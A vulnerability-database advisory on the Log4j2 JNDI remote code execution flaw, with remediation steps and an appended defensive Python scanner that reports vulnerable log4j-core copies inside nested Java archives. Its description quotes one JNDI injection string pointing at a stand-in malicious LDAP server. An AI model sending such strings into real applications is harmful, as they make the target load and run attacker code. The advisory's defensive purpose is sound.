Apache Log4j2 JNDI Remote Code Execution (404 page handler) - Vulnerability Database

Apache Log4j2 JNDI Remote Code Execution (404 page handler)

Description

Apache Log4j2 versions 2.0 through 2.14.1 contain a critical remote code execution vulnerability in their JNDI (Java Naming and Directory Interface) lookup feature. This widely-used Java logging library processes special syntax in log messages that can trigger lookups to external resources. When an attacker-controlled string containing a JNDI lookup expression (such as ${jndi:ldap://malicious-server/payload}) is logged by the application, Log4j2 will attempt to resolve it, potentially loading and executing arbitrary code from attacker-controlled LDAP or other JNDI servers. This vulnerability is particularly dangerous because user-supplied data is commonly logged in web applications, making exploitation straightforward in many scenarios.

Remediation

Take immediate action to remediate this critical vulnerability using one of the following approaches, listed in order of preference:

1. Upgrade Log4j2 (Recommended): Update to Log4j2 version 2.17.1 or later (2.12.4 for Java 7, 2.3.2 for Java 6). This completely removes the vulnerable functionality.

2. Apply Mitigation for Versions 2.10 and Above: If immediate upgrading is not possible, set the system property log4j2.formatMsgNoLookups to true by adding the following JVM argument:

-Dlog4j2.formatMsgNoLookups=true

3. Remove the Vulnerable Class: For versions 2.0 through 2.14.1, remove the JndiLookup class from the Log4j2 core JAR file:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

4. Java Version Upgrade: Ensure you are running Java 8u121 or later, which defaults com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. Note that this only provides partial protection against RCE via RMI and does not protect against LDAP-based attacks.

After applying fixes, verify the remediation by testing with known proof-of-concept payloads in a safe environment and scan your environment to identify all instances of Log4j2 in use, including transitive dependencies.
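As an added example for that last step (not Invicti's code, and not part of the Log4j2 project), the Python scanner below walks a deployment tree, opens every JAR/WAR/EAR including archives nested inside other archives, and classifies each log4j-core copy it finds using the version thresholds from step 1 and the JndiLookup.class removal from step 3. The sample WAR writer at the end is a constructed fixture with placeholder class bytes, not a real build.

```python
import io, re, zipfile
from pathlib import Path

# Class implementing the JNDI lookup, and the Maven metadata that records log4j-core's version
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")
# Fix thresholds from the remediation: 2.12.4 (Java 7), 2.3.2 (Java 6), otherwise 2.17.1
FIXED = {(2, 12): (2, 12, 4), (2, 3): (2, 3, 2)}

def parse_version(text):
    """'version=2.14.1' in pom.properties -> (2, 14, 1); None if absent."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", text, re.M)
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None
def is_fixed(v):
    """Branch-aware comparison: 2.3.x and 2.12.x have their own fix releases."""
    return v >= FIXED.get((v[0], v[1]), (2, 17, 1))

def scan_archive(data, label, findings):
    """Inspect one archive held in memory, recursing into nested JARs (WARs, fat JARs)."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return  # not a ZIP container; nothing to inspect
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace")) if POM_PROPS in names else None
        if JNDI_CLASS in names:
            status = "review: version unknown" if not version else ("fixed" if is_fixed(version) else "VULNERABLE")
            findings.append((label, version, status))
        elif version:
            findings.append((label, version, "class removed"))  # JndiLookup stripped (step 3)
        for n in names:
            if n.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(n), label + "!/" + n, findings)

def scan_directory(root):
    """Walk a deployment tree and report every log4j-core copy, patched or not."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_EXT:
            scan_archive(p.read_bytes(), str(p), findings)
    return findings

def write_sample_war(path, version="2.14.1"):
    """Constructed fixture (not a real build): a WAR embedding log4j-core with placeholder class bytes."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        z.writestr(POM_PROPS, "version=%s\n" % version)
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-%s.jar" % version, inner.getvalue())
```

A copy reported as "class removed" is one where step 3 was applied; "review: version unknown" means the class is present but the JAR carries no Maven metadata, so its version must be confirmed by other means.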